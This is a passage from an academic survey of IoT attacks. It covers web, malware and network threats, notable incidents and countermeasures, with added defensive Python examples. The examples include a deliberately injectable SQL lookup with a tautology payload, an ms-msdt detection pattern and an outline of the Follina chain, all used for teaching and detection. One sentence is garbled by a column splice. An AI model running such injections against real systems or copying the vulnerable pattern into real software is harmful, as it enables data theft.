• DTLS-based Attacks: since Transport Layer Security (TLS) intends to reliably deliver a data stream using end-to-end authenticated encryption, Datagram Transport Layer Security (DTLS), which is a communications protocol, is also used to deliver authenticated and encrypted end-to-end datagram-based application data with lower latency [136]. DTLS is used to deal with packet reordering, datagram loss, and data that is larger than the datagram network packet, thus offering, as a channel security protocol, integrated key management, parameter negotiation, and secure data transfer. The DTLS protocol is based on the stream-oriented Transport Layer Security (TLS) protocol to prevent eavesdropping, tampering, or message forgery, and relies on the Secure Real-time Transport Protocol (SRTP) to provide confidentiality, message authentication, and replay protection [137]. Key-reuse (rekeying) can be exploited to perform password attacks. Other attacks include Triple Handshake, as well as the SSL Stripping attack, the STARTTLS Command Injection (CVE-2011-0411) attack, the BEAST (CVE-2011-3389) attack, Padding Oracle and its variant, the POODLE attack (CVE-2014-3566), which are further described in Ref. [138].
• Session Hijack: also known as session hijacking, or key-to-gain unauthorised access to the IoT device's information session [139]. It usually occurs when the "Pass-the-Cookie" technique is used [140] to perform "blind" hijacking or man-in-the-middle attacks using sniffing programs.
• Masquerade Attacks: usually target connected networks and devices with weak authorisation by using a fake (network) identity to gain unauthorised access to personal information (e.g. usernames, passwords, logons, logins etc.) through legitimate access [141]. This attack can be performed by insiders (whistle-blowers within the organisation) or outsiders (remotely).
• Buffer Overflow: or buffer overrun is a program anomaly that overruns and overwrites a buffer's boundary with adjacent memory locations [142]. C and C++, Java and Python are common programming languages associated with buffer overflows. Such an attack would result in overwriting adjacent data, overwriting executable code(s), memory access errors, incorrect results, and constant crashing. Cryptographic and non-cryptographic solutions were presented to protect against buffer overflow attacks in Ref. [143]. Bounds checking is a suitable solution, but requires additional processing time. Moreover, randomising the memory layout and deliberately leaving buffer space are other suitable solutions to overcome buffer overflow attacks on Operating Systems (OS).
• Website Spoofing: includes creating fake (hoax) websites that mislead readers into believing their legitimacy by masquerading them as a legitimate website through a very similar design including a similar Uniform Resource Locator (URL) or Cloaked URL, and a shadow copy of the World Wide Web [144]. Website spoofing is always associated with phishing or e-mail spoofing.
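The Cookies Hijack and Session Hijack entries above describe the problem (a stolen or replayed cookie hands the attacker the session) without showing what the server side of the defence looks like. The following is an added example, not code from the paper, of issuing and validating a session cookie so that a forged, expired or replayed copy is rejected: an unguessable id, an HMAC tag, an idle timeout, the Secure/HttpOnly/SameSite cookie attributes, id rotation after login, and a check that the cookie is presented by the client it was issued to. The server key, the timeout, the in-memory session store and the User-Agent binding are all constructed for the demo.

```python
"""Hardened session cookies: issue, validate, rotate (added example, not from the paper)."""
from __future__ import annotations

import hashlib
import hmac
import secrets
import time

SERVER_KEY = b"constructed-demo-key-rotate-in-production"  # constructed demo secret
IDLE_TIMEOUT_S = 900  # 15 minutes without a request ends the session (demo value)

# Server-side store: the cookie carries only an opaque id, never user data.
_sessions: dict[str, dict] = {}


def _sign(session_id: str) -> str:
    """HMAC tag over the id, so an edited or guessed id fails before any lookup."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def _client_hash(user_agent: str) -> str:
    return hashlib.sha256(user_agent.encode()).hexdigest()


def issue_session(user: str, user_agent: str, now: float | None = None) -> str:
    """Return the cookie value 'id.tag' for a new session bound to this client."""
    now = time.time() if now is None else now
    session_id = secrets.token_urlsafe(32)  # 256 bits of entropy: not guessable
    _sessions[session_id] = {"user": user, "last_seen": now, "client": _client_hash(user_agent)}
    return f"{session_id}.{_sign(session_id)}"


def set_cookie_header(cookie_value: str) -> str:
    """Secure: sent over TLS only. HttpOnly: no script access, so XSS cannot read it.
    SameSite=Strict: not attached to cross-site requests (limits CSRF)."""
    return f"Set-Cookie: sid={cookie_value}; Path=/; Secure; HttpOnly; SameSite=Strict"


def validate_session(cookie_value: str, user_agent: str,
                     now: float | None = None) -> tuple[str | None, str]:
    """Return (user, reason); user is None when the cookie is rejected."""
    now = time.time() if now is None else now
    if "." not in cookie_value:
        return None, "malformed"
    session_id, tag = cookie_value.rsplit(".", 1)
    if not hmac.compare_digest(tag, _sign(session_id)):  # constant-time compare
        return None, "bad-signature"
    rec = _sessions.get(session_id)
    if rec is None:
        return None, "unknown-session"
    if now - rec["last_seen"] > IDLE_TIMEOUT_S:
        del _sessions[session_id]
        return None, "expired"
    if rec["client"] != _client_hash(user_agent):
        # The same cookie presented from a different client is the pass-the-cookie
        # pattern: end the session so the stolen copy is useless from now on.
        del _sessions[session_id]
        return None, "client-mismatch"
    rec["last_seen"] = now
    return rec["user"], "ok"


def rotate_session(cookie_value: str, user_agent: str,
                   now: float | None = None) -> str | None:
    """Replace the id after login or a privilege change (defeats session fixation)."""
    user, _reason = validate_session(cookie_value, user_agent, now)
    if user is None:
        return None
    del _sessions[cookie_value.rsplit(".", 1)[0]]
    return issue_session(user, user_agent, now)
```

The User-Agent binding only catches a careless replay from a different browser, since the header itself is copyable; the checks that carry the real weight are the unguessable id, the server-side store (nothing to tamper with in the cookie), the idle timeout, rotation, and the cookie attributes, which are what Table 3 summarises as "Session Key Management" and "HTTPS".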

• Malicious Code Injection Attacks: usually occur on poorly configured and poorly secured web applications [145] for IoT users. In fact, they can be easily exploited by any hacker through a malicious code injection or an SQL injection attack. As a result, this malicious script will be running on the victim's device without their knowledge [146], registering keystrokes or/and retrieving all of the user's credentials including emails, passwords, credit card numbers, along with cookies, browsers, and the device's/user's ID.
• SQL Injection Attacks: The impact of SQL injection attacks varies depending on the objective and aim of a given hacker [147]. Such an aim is based on either manipulating database information, gathering sensitive data, or even executing a DoS attack. In Ref. [148], SQL injections were divided into three different categories. These categories include three order attacks. The first order attack is based on the attacker entering a malicious string to modify the executed code. The second order attack is based on the injection into a storage executed by another action. The third order attack is the later injection, where the attacker manipulates the function by changing its environment variables. On the other hand, there are different SQL injection methods that can be applied [147,149], and they are presented in Table 2. The focus on this type of attack is due to it being an active method used by hackers mainly to target university websites, such as the infamous known cases of the Team GhostShell SQL attacks (Oct. 2012, targeting 53 universities), the Rasputin SQL attack (Feb. 2017, targeting 60 universities), and the LulzSec ITA SQL attack (Feb. 2020, targeting 3 universities) [150]. Further information about SQLi attack types is discussed in Ref. [151].
• Cross-Site Scripting: or XSS is a web application security vulnerability based on a malicious code injection by malicious web users. In fact, recent attacks were able to leverage session IDs by relying on JavaScript functions on other websites to inject them into different pages. This included online banking, instant messaging and emails. Therefore, being capable of stealing a user's session which, in turn, can be used to steal stored web cookies. This allows the attacker to replicate a user's session on a different machine [152,153]. Another form of XSS is based on the attacker sending HTTP requests at his own will from his victim's machine, or sending false counterfeited requests relying on the use of especially sophisticated tool(s).
• Cross-Site Request Forgery: Cross-Site Request Forgery (CSRF) takes advantage of any possible lack of authorisation that is either absent or weakly employed in poorly designed web applications. The first step of performing this attack is based on the hacker making the victims run the malicious script through clicking on a malicious link without their knowledge, therefore allowing the attacker to use the victims' saved credentials to perform further attacks on their behalf, and without their knowledge. Such attacks usually take place through a network request injection relying on the browser of the user, which permits a website to show every HTTP request to any given network address [153].

Table 2
Different SQL injection attacks that can target database application servers used by IoT users.

SQL Injection Type | Description
Blind Injection | Logical conclusions are derived from the answer to a true/false question regarding the database
Logically Incorrect Queries | Using different error messages to retrieve information to exploit and inject a given database
Piggy-Backed Queries | Malicious queries are additionally inserted into an already injected original query
Stored Procedure Injection | Executing the database's built-in functions using malicious SQL scripts/codes
Tautology | SQL injection queries injected so they always result in a true statement
Timing Attack | Collecting information by noticing the database response time
Union Query | Malicious query joined with a safe query using UNION to get other table-related information

3.1.2. Application attacks

Application attacks against the IoT can take many forms, from covert attacks (surveillance) to much more overt ones such as viruses. This paper discusses the most frequent attacks that take place against IoT applications.

• Scareware: uses social engineering techniques to trick its victims into downloading/purchasing unwanted dangerous rogue software (ransomware) by using fear as the tactic [154]. This is done by urging users to download a fake software (i.e. an Anti-Virus) to remove a recently detected (fake) virus. Scareware can take many forms including antivirus, anti-spyware, firewall application or a registry cleaner. Scareware may include a clickjacking feature that redirects users to a malicious website that triggers a malware download once the user clicks on the "Cancel" or the "X" buttons to close the window.
• Spyware: is a part of the malware family, masqueraded in a (malicious) software [155,156] that installs itself on a given device to covertly monitor its victims' online/offline behaviour without their knowledge and permission [157] and gain details about them (e.g. names, addresses, browsing history, downloads etc.). Spyware can act as adware by marketing data firms, or can be a Trojan. Such an attack can degrade a system's performance, damage the Central Processing Unit (CPU) capacity, affect the disk usage and cause network traffic overhead.
• Trojans: these include two types: Software Trojans (STs), which are often disguised as legitimate software employed by cyber-criminals to gain access to users' systems, and Hardware Trojans (HTs), which cause a malicious modification of the circuitry of an integrated circuit to disable or destroy the entire chip and its components [158]. Once activated, Trojans can steal, spy, exploit, implement backdoors (rootkit) to delete, block, modify, and disrupt data [159]. Trojans can take many forms: Trojan-Banker (steals account data), Trojan-DDoS (denying service), Trojan-Downloader (downloads/installs new malicious program versions), Trojan-Dropper (installs viruses), Trojan-FakeAV (fake Anti-Virus), Trojan-GameThief (steals online gamers' accounts), Trojan-IM (steals users' usernames/passwords of Skype, Yahoo, Messenger, etc.), Trojan-Ransom (modifies the computer's data as part of a ransomware attack), Trojan-SMS (sends text messages from their victims' phones), Trojan-Spy (logs keystrokes, keeps users under surveillance), and Trojan-Mailfinder (harvests email addresses).
• Botnet: bots or zombies tend to exploit IoT devices that suffer from the same vulnerability [160], and can also be used to launch DoS and DDoS attacks by being ordered from a command and control (C&C) software. Botnets can steal data, send spam, or gain remote access. Botnets can take many forms including Hybrid Botnets [161], Internet Relay Chat (IRC) botnets [162], Cloud Botnets [163], Peer-to-Peer (P2P) botnets [164], Hyper Text Transfer Protocol (HTTP) botnets, and Mobile (SMS/Bluetooth) botnets [165], along with many other botnet types.
• Virus: is designed to target IoT systems and devices by spreading from host to host either through human interaction (Trojan, Logic Bomb [166,167] etc.) or without human intervention (worm) [168]. Unlike worms, viruses cannot spread or reproduce without human interaction, since a virus is a malicious code or program written to alter the way a computer performs. Viruses can be attached to a program, file, funny images, audio/video files, socially shareable content or documents, to steal data/passwords, register keystrokes, corrupt files, send spam, erase data or cause permanent hard disk damage [169]. This can also result in file infection [170]. Infected devices show various symptoms including frequent pop-up windows, homepage changes, frequent crashes, and slow performance. Therefore, it is

always important to use trusted/verified up-to-date anti-viruses, avoid clicking on pop-up advertisements, and use spam filters.
• Rootkit: is used to gain remote administrator-level access to a computer or network by stealing an administrator password or exploiting a system's (OS, firmware or application) vulnerability [171]. Rootkits can deactivate/destroy anti-malware software to avoid detection and make their tracking extremely difficult. Moreover, rootkits can ensure backdoor access through key logging, or turn a given vulnerable device into a bot.

3.1.3. Network attacks

Poorly secured and non-secured IoT networks, including servers, channels and gateways, are vulnerable to various threats and attacks that exploit their security gaps. The most commonly known types of these attacks are as follows:

• Eavesdropping: is known as a passive interception of communication between two parties and can take many forms such as: sniffing, by installing a network monitoring software called a sniffer, or a snooping attack, where an eavesdropper passively intercepts non-secure or weak communication between two parties to steal their information and credentials via the communication network [172]. To overcome this attack, avoid public Wi-Fi networks, and use firewalls, proxies and Virtual Private Networks (VPN).
• Replay: also known as playback attacks, these are lower-tier versions of a "Man-in-the-middle attack" where an attacker eavesdrops on a secure network communication and intercepts it for repeated transmission later on, to cause delays or disruption of service. To overcome this attack various solutions can be presented, such as using timestamps, securing data storage with key update, using security protocols [173], using attentive filtering networks for audio replay attack detection [174], and using Magnitude and Phase Information with Attention-based Adaptive Filters [175].
• Man-in-the-Middle: (MITM) is an active eavesdropping form where the attacker impersonates each endpoint to alter, intercept and directly monitor the communications between two parties and tricks them into believing that they are communicating with each other [176]. Therefore, encrypting communication is required, and using a mutually trusted Certificate Authority (CA) between both parties is a must.
• Packet Sniffing: intercepts the data through the capture of traffic using sniffer software [177] over non-secure channels and reads the unencrypted data. Captured data can be analysed to gain access or information. To overcome this issue, channels must be secured and data must be encrypted.
• Password Cracking: is a cryptanalysis process that aims to crack passwords to recover credentials and gain access to systems (System Administration privileges) and data [178]. Password cracking can range between brute force [179] (protected using multi-factor authentication), dictionary [180] (protected using a passphrase), Meet-in-the-middle [181] (protected using stronger keys), online/offline password guessing [182] (protected using encrypted password form), rainbow-table [183] (protected using a salting technique), and birthday [184] (protected using hashing) attacks, with many commercial/free tools being used and available for this task.
• Traffic Analysis: intercepts and examines encrypted/unencrypted network traffic to recover any useful information (header, message length, repeated patterns, processing time, transmission delay, etc.) [185]. This renders large, periodic, encrypted and plaintext traffic under constant watch. To overcome this attack, sophisticated cryptographic solutions are needed, as well as the use of The Onion Router (TOR).
• Wireless Jamming: is used to compromise a secure/non-secure wireless environment (mainly Local Area Networks (LAN)) [186] by denying access and transceiving services to authorised users, by blocking and jamming all legitimate wireless traffic on all targeted frequencies (mainly FM, GSM, 2.4 and 3, 4 or 5 GHz). To overcome this attack, Wireless LANs can be used, along with frequency hopping and shifting techniques.
• Black-hole: the packet drop attack or blackhole attack is classed as a denial-of-service (DoS) attack by employing a router that (sometimes selectively) discards packets instead of relaying them [187]. Due to the lossy network nature, packet drop attacks are very hard to detect and prevent. Hence, they are frequently deployed to attack wireless ad-hoc networks. This type of attack can be mitigated using a Timer Based Baited Technique presented in Ref. [188].
• Byzantine: attacks have total control over a number of authenticated devices before behaving arbitrarily [189]. This type of attack turns insider nodes into malicious ones by preventing route establishment, modifying route selections, and dropping route requests, therefore disrupting and degrading the performance of both network and routing services. Byzantine takes many forms of attacks, including Byzantine Wormhole attacks and Byzantine Overlay Network Wormhole attacks, in addition to other attacks that are further discussed in Ref. [189].
• DoS/DDoS: a denial-of-service (DoS) attack prevents legitimate users from accessing their services through an excessive sending of authentication requests with invalid return addresses [190]. A Distributed-Denial-of-Service (DDoS) attack compromises multiple systems (compromised through a Trojan and turned into bots) before simultaneously flooding the victims with massive incoming traffic from multiple sources. DDoS attacks have many types including: traffic attacks, flooding Transmission Control Protocol (TCP) packets, flooding User Datagram Protocol (UDP) and Internet Control Message Protocol (ICMP) packets, bandwidth attacks (sending massive junk data), and application attacks (depleting application layer resources).

Finally, a penetration testing risk assessment is presented in Table 3 with the appropriate security measures per attack depending on the security target: (C)onfidentiality, (I)ntegrity, (Av)ailability and (Au)thentication.

3.2. Cyber-activity against IoT

Hacking against IoT can take part in, or even be part of, a cyber-activity led by a hacking group or individual(s), either locally, regionally or globally. As a result, hacking can take many forms, depending on the motives mentioned earlier, and on the goal, cause and objective. Such cyber-activity can be cyber-crimes, cyber-terrorism, cyber-warfare, and cyber-espionage, targeting IoT systems including (but not limited to) Medical IoT [5], Industrial IoT (i.e. Cyber-Physical Systems [20], power-line stations [22] and long range communication [21]), and Military IoT (i.e. Drones/UAVs [23] and robotics [24]).

The possible cyber-activities that can benefit from the exploitation of IoT devices are listed in the following:

• Cyber-Crimes: Hackers mainly rely on cyber-theft, cyber extortion, and skimming [196] in order to steal financial or personal information via IoT systems, computers, devices or insecure browsers to target businesses, organisations, installations and sometimes for cyber-bullying purposes against the youth [197]. This was done by breaching the security measures to intercept data, and also by targeting engines, wikis and blogs by constantly sending empty messages. This was mitigated by using adaptive neuro-fuzzy inference systems [198]. This concept was adopted by the attackers to carry out various types of malware attacks [199]. In fact, cyber-heist is a large scale monetary theft which can be realised by relying on digital devices such as IoT ones to perform cyber-crimes through hacking, with Crime-ware kits [200] including SpyEye [201], Butterfly Bot [202] and Zeus [203] being the most used hacking tools. The most infamous cyber-heist act was the MIRAI attack.
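The SQL Injection and Cross-Site Scripting entries under Web attacks, the Tautology row of Table 2, and the "Input Validation" and "Filter Input/Output" measures of Table 3 describe the defect and the fix in words only. The following is an added example, not code from the paper, that puts the vulnerable lookup beside its hardened form against an in-memory SQLite table, shows why a tautology input such as `' OR '1'='1` widens the first query and not the second, adds an allow-list validator for the username, and escapes untrusted text before it is placed in an HTML page. The table, its rows and the username rule are constructed for the demo.

```python
"""SQL injection and XSS: vulnerable form beside the hardened form (added example, not from the paper)."""
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed demo table; stands in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Untrusted input spliced into the statement text. With a tautology such as
    ' OR '1'='1 the WHERE clause becomes  name = '' OR '1'='1'  and matches every row;
    the database cannot tell the attacker's text from the developer's SQL."""
    query = f"SELECT name, email FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameter binding: the statement is fixed and the value travels separately,
    so whatever the input contains it is only ever compared as a string literal."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def is_valid_username(name: str) -> bool:
    """Allow-list validation (Table 3: Input Validation), applied before the query
    runs: a constructed rule that admits only short alphanumeric names."""
    return 1 <= len(name) <= 32 and name.isalnum()


def render_comment_vulnerable(comment: str) -> str:
    """Raw interpolation: a comment containing markup is interpreted by the browser."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Output escaping (Table 3: Filter Input/Output): the text is shown, not executed."""
    return f"<p>{html.escape(comment)}</p>"


if __name__ == "__main__":
    db = build_db()
    attacker_input = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, attacker_input))  # both rows
    print("safe:", lookup_safe(db, attacker_input))              # no rows
    print("validated:", is_valid_username(attacker_input))       # False
    print(render_comment_safe("<b>hi</b>"))
```

Binding parameters removes the injection; the allow-list is a second, independent layer that also rejects the input before it reaches the database, and the escaping shows the same principle applied on the way out of the application rather than on the way in.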

Table 3
Security attacks against IoT entities and users with possible security measures. Targeted security goals: (C)onfidentiality, (I)ntegrity, (Av)ailability, (Au)thentication.

Attack Target | Attack Type | C | I | Av | Au | Cryptographic measures | Non-cryptographic measures
Web Attacks | Cookies Hijack | ✓ | X | X | ✓ | Encrypted Connection | HTTPS, Secure Websites
Web Attacks | Session Hijack | ✓ | X | X | ✓ | Encrypted Connection | Session Key Management, Secure SSL/TLS, HTTPS
Web Attacks | Masquerade Attack | ✓ | ✓ | X | ✓ | Encrypted Communication | Code Signing, Execution Prevention, File/Directory Permissions
Web Attacks | Buffer Overflow | X | X | ✓ | X | – | Bound Checking, Randomized Memory Layout
Web Attacks | Website Spoofing | ✓ | X | ✓ | X | – | Secure Websites, Web Filtering, Anti-Phishing Training, Netcraft
Web Attacks | Malicious Code Injection | ✓ | ✓ | X | X | – | Proper Secure Coding
Web Attacks | SQL Injection | ✓ | ✓ | ✓ | X | Secure Coding | Input Validation
Web Attacks | Cross-Site Scripting | ✓ | ✓ | ✓ | X | Secure Coding | Filter Input/Output, Security Policy
Web Attacks | Cross-Site Request Forgery | ✓ | ✓ | X | X | Read-only GET requests | Cross-Site Request Forgery
Application Attacks | Scareware | ✓ | ✓ | X | ✓ | – | Anti-Virus, Anti-Ransomware, Awareness
Application Attacks | Cookies Hijack | ✓ | X | X | ✓ | Encrypted Connection | HTTPS, Secure Websites
Application Attacks | Spyware | ✓ | X | X | X | – | Anti-Spyware, Updated Software Patches, Trusted Third Parties
Application Attacks | Trojan | ✓ | ✓ | ✓ | X | – | Anti-Virus, Updated Software Patches, Awareness
Application Attacks | Botnet | ✓ | ✓ | ✓ | X | – | Anti-Malware Software, Updated Systems, Disabled Unused Ports, Awareness
Application Attacks | Virus | ✓ | ✓ | ✓ | X | – | Anti-Virus, Firewalls, Awareness, Updated Systems
Application Attacks | File Infection | ✓ | ✓ | X | X | – | Anti-Virus, Prevented P2P File Sharing, IDS, Awareness
Application Attacks | Rootkit | ✓ | ✓ | ✓ | ✓ | – | Advanced Anti-virus, Awareness, Updated Systems, IDS/IPS
Network Attacks | Eavesdropping | ✓ | X | X | X | Encrypted Data & Communication | Personal Firewall, Proxies, VPN
Network Attacks | Replay | X | X | X | ✓ | Encrypted Data & Communication | VPN & Personal Firewall
Network Attacks | Man-in-the-Middle | ✓ | ✓ | X | ✓ | Digital Certificate & Encrypted Communication | VPN, Strong Authentication & Tamper Detection
Network Attacks | Packet Sniffing | X | X | ✓ | X | PKI [191] | VPN, TLS & SSL [191]
Network Attacks | Password Cracking | ✓ | X | X | ✓ | Strong Hashing | Strong Multi-Factor, Constant Password Changing, Strong Passwords
Network Attacks | Traffic Analysis | X | X | ✓ | X | Encrypted SIP [192], Secure Communication | Network Filtering, Network Monitoring & Analysis
Network Attacks | Wireless Jamming | X | X | ✓ | X | Encrypted Channels, Secure Communication Lines | FHSS and DSSS [193]
Network Attacks | Black-hole | X | X | ✓ | X | ECC [194] | HMM [195], R-AODV [194]
Network Attacks | Byzantine | X | X | ✓ | ✓ | – | Secure Endpoints, Advanced Firewalls, IDS/IPS, Traffic Monitoring/Analysis

• Cyber-Espionage: became another dangerous emerging field seriously targeting IoT, especially when a Stuxnet worm attack targeted the Iranian nuclear power grids [204], followed by other similar attacks (i.e. Flame, Duqu and Gauss variants) [205]. Another aspect of cyber-espionage is industrial cyber-espionage [206]; one such case took place in 1997, where engineers disclosed sensitive business information to the company's competitors. In fact, such an attack was revealed through received emails and faxes. The engineer was accused of industrial espionage and was sentenced to around two and a half years in jail. A large spy network called GhostNet [207] was revealed by Canadian researchers in 2009. It was responsible for more than a thousand computer intrusions in more than 103 countries, gaining unauthorised access, and compromising different devices. Operation Shady RAT is the most infamous cyber-espionage case that affected more than 70 companies and organisations since 2006 [208]. It was spread through an e-mail with a malicious link attached to it as a self-loading remote-access tool, or Remote Access Trojan (RAT), thus gaining unauthorised access to legal entities and sensitive data. This is similar to the case studies of Smallcase, Derusbi, and Sakula RATs [209].
• Cyber-Terrorism: Due to the availability of hacking tools and of the internet with high-speed real-time data transmission, and the ease of obtaining laptops, computers, and mobile phones at low prices, it became a source of attraction for terrorists with psychological effects [210]. As a result, terrorists started using it as a new emerging type of cyber-warfare, known as asymmetric cyber-warfare, in order to lead cyber-attacks against IoT systems mainly belonging to Western governments and military installations [211]. Their extremist motives are usually either religious-based or racial-based via the spread of hate, terror, fear and/or racism through hacking. This was mainly done through defacing/hacking websites, or mostly DoS/DDoS attacks [212].

In fact, terrorists are now also relying on online methods to perform their online cyber-attacks in a cheaper but much more effective way to express or impose extreme politico-religious views [213–215].

• Cyber-Warfare: or information dominance and/or information warfare [216], became a new type of cyber-war and part of the electronic warfare being waged against sensitive IoT systems and domains. This was achieved through cyber-space against different countries [217], in order to cripple their cyber-ability and capability and smart infrastructure with a group of cyber-army or cyber-warriors [218,219]. A global cyber-war [107] was already waged against ISIS/ISIL in Ref. [220]. This war managed to decisively defeat their cyber-caliphate online, and froze their online activities. Another attack was led by Russia against Georgia and Estonia in 2007–2008, by sending multiple waves of DDoS attacks, as well as against Ukraine following the Russo-Ukraine conflict since 2014 [221], which was renewed in January, February and March 2022, thereby crippling their online available services [222,223]. In fact, cyber-warfare can be part of the electronic warfare domain to ensure the Battlefield's Situational Awareness (BSA) using Cyber Electronic Warfare (CEW) [224,225]. One example is the ongoing cyber-war between the North Atlantic Treaty Organisation (NATO) members

289
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

and both Russia and China [226,227], especially in the Balkans leads to stealing online money as much as possible, in the least
[228]. amount of time.
3.3. Targeted IoT fields

The new adoption and widespread use of the internet, and more recently of the IoT, is based on digitising data and records that are stored and processed by cloud services. This gave hackers the opportunity to launch cyber-attacks against numerous IoT sectors such as banks, enterprises, governments, military installations, hospitals, and individuals.

• Organisations: any national/international organisation or small/medium enterprise is also prone to a wide range of cyber-attacks [229], which can severely impact its operational performance [230]. These cyber-attacks are based on targeting the organisation's devices, relying on phishing and spear-phishing attacks [231,232]. Such attacks can infect a given organisation device with malware capable of recording keystrokes, or inject spyware or a Trojan horse (RAT), which turns the devices into bots of a botnet or grants elevated access privileges.

• Banks: The most common attacks against banks hit the availability of a given bank and prevent legitimate users from accessing and using the available services. This can have devastating effects on systems and people alike, targeting and compromising both systems and data confidentiality, integrity or/and availability. Moreover, a cyber-heist [233,234] can also occur, which aims at stealing as much money online as possible in the least amount of time.

• Enterprises: are also prone to cyber-attacks led by hackers to disrupt and interrupt their services. In fact, smaller enterprises are the most vulnerable to attacks by hackers. By quantifying a given risk [235], financial losses were estimated to reach more than $445 billion yearly, which is quite a high number.

• Governments: are mainly targeted either by hacktivists, cyber-terrorists [236], or even by cyber-espionage attacks. Hacktivists perform their attacks as a form of protest, relying on hacking as a tool in order to make a clear statement. Cyber-espionage, however, is led by foreign rival governments against other governments by relying on cyber-intelligence agencies. In fact, it is part of information gathering in order to lead much more sophisticated cyber-attacks against smart infrastructure, or even to affect election polls [237,238].

• Hospitals: also became a perfect target for hackers who steal patients' private data and sell them to malicious parties. In May 2017, the National Health Service (NHS) came under a WannaCry ransomware attack, attributed to North Korea's Cyber-Unit 180 (Lazarus) [239], before establishing a security operations centre and investing £250,000 to raise awareness and train NHS employees. On January 11th, 2018, Hancock Regional Hospital in Indianapolis was infected by malware delivered via e-mail, i.e. a phishing attack [239]. The hackers locked the hospital's computer systems and demanded a ransom in the Bitcoin crypto-currency, leading the hospital to pay $55,000 as ransom [240].

Fig. 5. Proposed cyber-classification taxonomy.


• Military Websites: A new emerging technique has two main aspects, cyber-warfare [241,242] (e.g. the Russia-Ukraine case [243]) or cyber-terrorism [78,91]. It can also take a secondary aspect by being part of a hacktivism campaign led by protesters (e.g. Anonymous) [74], or led by state-sponsored hackers such as Iranian and Iranian-backed hackers, state-sponsored proxies (e.g. Hezbollah [244]) and the Syrian Electronic Army group [245] against a given (US/Israeli) military action [246]. Therefore, the military seems to be a recent cyber-target of different hackers [247], where bits and bytes are replacing bullets and bombs in the cyber-physical world.

Finally, this paper summarises them in Fig. 5.

4. Real-case IoT-related events

In this section, we present some real security events that took place against IoT servers, gateways and end-devices, including real-case vulnerability and database exploits, along with real cyber-attack events, and we highlight some possible security measures.

4.1. Real-case vulnerability exploitation

Several real case studies are mentioned and briefly discussed to highlight how such vulnerabilities were exploited to conduct cyber-attacks, including:

• Adobe Flash Incident: in 2013, Adobe suffered a breach [248]. In 2015, Adobe Flash came under attack. The exploited vulnerabilities were zero-days, mainly CVE-2015-5119, CVE-2015-5122 and CVE-2015-5123.

• Equifax Data Breach Incident: took place in 2017, when an unpatched Apache Struts vulnerability, CVE-2017-5638 (disclosed in March 2017), in an application running on Equifax's web servers was exploited; the impact was compounded by Equifax's administrators not applying least-privilege controls. After accessing the web server, the attackers moved into the databases and siphoned the private information of 143 million consumers, including names, addresses, dates of birth, social security numbers and credit card numbers, costing around $3 billion to resolve the breach. Hence the importance of a zero-trust approach to Privileged Access Management (PAM) [249].

• Exploit - CVE Variants Incidents: CVE variants were prone to various exploits [250]. In early 2021, Microsoft detected attacks that leveraged vulnerabilities in Microsoft Exchange Server. These attacks were classified as zero-day and were tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. The exploitation took place when attackers managed to inject malicious code into the resources used by the Exchange Offline Address Book (OAB) service [251,252].

• Exploit - CVE-2020-1472 (Zerologon): was a critical Microsoft Netlogon vulnerability which allowed an attacker to escalate privileges to the highest level without having any credentials. This was done when the attacker managed to reset the computer account password of a domain controller, with or without later restoring the original password [253].

• Exploit - CVE-2020-0688 Incident: was publicly detailed on February 26, 2020. Exploitation requires the credentials of an already compromised account, which are leveraged to authenticate to Outlook Web Access (OWA); the credentials were obtained through password guessing or a poor password policy, allowing the attacker to exploit the Exchange Control Panel (ECP).

• Exploit - 05-2022-0438.doc Incident: was revealed on May 30, 2022, and concerns a zero-day flaw in Microsoft Office (CVE-2022-30190, "Follina") that allows arbitrary code execution on affected Windows systems. The Word document was uploaded to VirusTotal from an IP address in Belarus, where it was discovered. The exploit uses Word's external link to load an HTML file ("RDF842l.html"), then the 'ms-msdt' scheme to execute PowerShell code. Its severity level is similar to the CVE-2021-40444 exploit.

Fig. 6. Vulnerability & Security Solutions at different IoT's Components.
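The loader pattern in the 05-2022-0438.doc entry above can be checked for without opening the document. The following Python is an example added here (not code from the paper nor from any of the tools it lists): it unpacks a .docx and flags OLE-object relationships whose target is external, then checks a fetched HTML page for the ms-msdt: scheme. The sample document and HTML are constructed inline; the IP address and file name are placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")
# The ms-msdt: URL scheme, including the URL-encoded colon a page may use.
MSDT_RE = re.compile(r"ms-msdt(?::|%3a)", re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> List[str]:
    """Return targets of OLE-object relationships marked TargetMode="External".

    A benign document keeps its OLE payloads inside the package; an external
    http(s) target is fetched when the document is opened, which is the
    loader step the incident above relied on.
    """
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return hits
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == OLE_REL
                    and rel.get("TargetMode") == "External"):
                hits.append(rel.get("Target", ""))
    return hits


def has_msdt_scheme(html: str) -> bool:
    """True when the page tries to hand a URL to the MSDT protocol handler."""
    return MSDT_RE.search(html) is not None


def triage(docx_bytes: bytes, fetched_html: str = "") -> Dict[str, object]:
    """Combine both checks into a verdict a SOC playbook could act on."""
    targets = external_ole_targets(docx_bytes)
    msdt = has_msdt_scheme(fetched_html)
    if targets and msdt:
        verdict = "malicious"
    elif targets:
        verdict = "suspicious"      # external OLE load, payload not yet seen
    else:
        verdict = "clean"
    return {"external_ole_targets": targets, "msdt_scheme": msdt,
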